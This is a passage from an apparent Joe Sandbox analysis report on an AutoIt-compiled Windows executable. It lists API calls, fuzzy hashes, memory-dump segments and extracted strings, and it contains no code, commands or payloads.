          • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
          • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
          • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
          APIs
          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: LogonUser
          • String ID:
          • API String ID: 1244722697-0
          • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
          • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
          • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
          • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
          APIs
          • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: NameUser
          • String ID:
          • API String ID: 2645101109-0
          • Opcode ID: 9968bc0305ce953d75259f13acf4e14cf0aaf7ba71429c5d6b87edd971c40a2f
          • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
          • Opcode Fuzzy Hash: 9968bc0305ce953d75259f13acf4e14cf0aaf7ba71429c5d6b87edd971c40a2f
          • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID: N@
          • API String ID: 0-1509896676
          • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
          • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
          • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
          • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
          • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
          • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
          • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
          • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
          • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
          • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
          • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
          • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
          • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
          • Instruction ID: 1be110723fa64262e89d0aec0a1a20255c1bae91910aebb39a61821022ff9223
          • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
          • Instruction Fuzzy Hash: 55B1B533D0A6B3058736836D05582BFFE626E91B8031FC396CDD03F399C62AAD9295D4
          APIs
          • DeleteObject.GDI32(?), ref: 0045953B
          • DeleteObject.GDI32(?), ref: 00459551
          • DestroyWindow.USER32 ref: 00459563
          • GetDesktopWindow.USER32 ref: 00459581
          • GetWindowRect.USER32(00000000), ref: 00459588
          • SetRect.USER32 ref: 0045969E
          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
          • CreateWindowExW.USER32 ref: 004596E8
          • GetClientRect.USER32 ref: 004596F8
          • CreateWindowExW.USER32 ref: 0045973B
          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000), ref: 00459760
          • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
          • GlobalLock.KERNEL32 ref: 0045978F
          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
          • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
          • CloseHandle.KERNEL32(00000000), ref: 004597AC
          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
          • GlobalFree.KERNEL32(00000000), ref: 004597E2
          • CopyImage.USER32 ref: 0045980E
          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
          • ShowWindow.USER32(?,00000004), ref: 00459865
          • CreateWindowExW.USER32 ref: 004598AF
          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
          • GetStockObject.GDI32(00000011), ref: 004598CD
          • SelectObject.GDI32(00000000,00000000), ref: 004598D5
          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
          • DeleteDC.GDI32(00000000), ref: 004598F8
          • _wcslen.LIBCMT ref: 00459916
          • _wcscpy.LIBCMT ref: 0045993A
          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
          • GetDC.USER32(00000000), ref: 004599FC
          • SelectObject.GDI32(00000000,?), ref: 00459A0C
          • SelectObject.GDI32(00000000,00000007), ref: 00459A37
          • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
          • ShowWindow.USER32(?,00000004), ref: 00459A6D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
          • String ID: $AutoIt v3$DISPLAY$static
          • API String ID: 4040870279-2373415609
          • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
          • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
          • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
          • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
          APIs
          • GetSysColor.USER32 ref: 0044181E
          • SetTextColor.GDI32(?,?), ref: 00441826
          • GetSysColorBrush.USER32 ref: 0044183D
          • GetSysColor.USER32 ref: 00441849
          • SetBkColor.GDI32(?,?), ref: 00441864
          • SelectObject.GDI32(?,?), ref: 00441874
          • InflateRect.USER32 ref: 004418AA
          • GetSysColor.USER32 ref: 004418B2
          • CreateSolidBrush.GDI32(00000000), ref: 004418B9
          • FrameRect.USER32 ref: 004418CA
          • DeleteObject.GDI32(?), ref: 004418D5
          • InflateRect.USER32 ref: 0044192F
          • FillRect.USER32 ref: 00441970
            • Part of subcall function 004308EF: GetSysColor.USER32 ref: 00430913
            • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
            • Part of subcall function 004308EF: GetSysColorBrush.USER32 ref: 0043094E
            • Part of subcall function 004308EF: GetSysColor.USER32 ref: 00430959
            • Part of subcall function 004308EF: GetSysColor.USER32 ref: 00430979
            • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
            • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
            • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
            • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
            • Part of subcall function 004308EF: InflateRect.USER32 ref: 004309D9
            • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
            • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
            • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
          • String ID:
          • API String ID: 69173610-0
          • Opcode ID: 61edd420cf503f0b2e16080aed4dfefbd84293bb954222feab0248525725e5df
          • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
          • Opcode Fuzzy Hash: 61edd420cf503f0b2e16080aed4dfefbd84293bb954222feab0248525725e5df
          • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
          APIs
          • DestroyWindow.USER32 ref: 004590F2
          • SystemParametersInfoW.USER32 ref: 004591AF
          • SetRect.USER32 ref: 004591EF
          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
          • CreateWindowExW.USER32 ref: 00459242
          • GetClientRect.USER32 ref: 0045924E
          • CreateWindowExW.USER32 ref: 00459290
          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
          • GetStockObject.GDI32(00000011), ref: 004592AC
          • SelectObject.GDI32(00000000,00000000), ref: 004592B4
          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
          • DeleteDC.GDI32(00000000), ref: 004592D6
          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
          • CreateWindowExW.USER32 ref: 0045936E
          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
          • CreateWindowExW.USER32 ref: 004593C8
          • GetStockObject.GDI32(00000011), ref: 004593D3
          • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
          • ShowWindow.USER32(?,00000004), ref: 004593EE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
          • API String ID: 2910397461-517079104
          • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
          • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
          • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
          • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __wcsnicmp
          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
          • API String ID: 1038674560-3360698832
          • Opcode ID: d3b13d2d210588f42260a91b167181014f2011d22ca391bd0a5c30519b55ecdb
          • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
          • Opcode Fuzzy Hash: d3b13d2d210588f42260a91b167181014f2011d22ca391bd0a5c30519b55ecdb
          • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Cursor$Load
          • String ID:
          • API String ID: 1675784387-0
          • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
          • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
          • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
          • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
          APIs
          • GetSysColor.USER32 ref: 00430913
          • SetTextColor.GDI32(?,00000000), ref: 0043091B
          • GetSysColor.USER32 ref: 00430933
          • SetTextColor.GDI32(?,?), ref: 0043093B
          • GetSysColorBrush.USER32 ref: 0043094E
          • GetSysColor.USER32 ref: 00430959
          • CreateSolidBrush.GDI32(?), ref: 00430962
          • GetSysColor.USER32 ref: 00430979
          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
          • SelectObject.GDI32(?,00000000), ref: 0043099C
          • SetBkColor.GDI32(?,?), ref: 004309A6
          • SelectObject.GDI32(?,?), ref: 004309B4
          • InflateRect.USER32 ref: 004309D9
          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
          • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
          • GetWindowTextW.USER32 ref: 00430A5A
          • InflateRect.USER32 ref: 00430A86
          • DrawFocusRect.USER32 ref: 00430A91
          • GetSysColor.USER32 ref: 00430A9F
          • SetTextColor.GDI32(?,00000000), ref: 00430AA7
          • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
          • SelectObject.GDI32(?,?), ref: 00430AD0
          • DeleteObject.GDI32(00000105), ref: 00430ADC
          • SelectObject.GDI32(?,?), ref: 00430AE3
          • DeleteObject.GDI32(?), ref: 00430AE9
          • SetTextColor.GDI32(?,?), ref: 00430AF0
          • SetBkColor.GDI32(?,?), ref: 00430AFB
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
          • String ID:
          • API String ID: 1582027408-0
          • Opcode ID: f79caee06455809a290934cecdfdd6b9048709b32a7c96ad06fa36b73db71484
          • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
          • Opcode Fuzzy Hash: f79caee06455809a290934cecdfdd6b9048709b32a7c96ad06fa36b73db71484
          • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
          APIs
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?), ref: 0046BB40
          • RegCloseKey.ADVAPI32(?), ref: 0046BB8A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
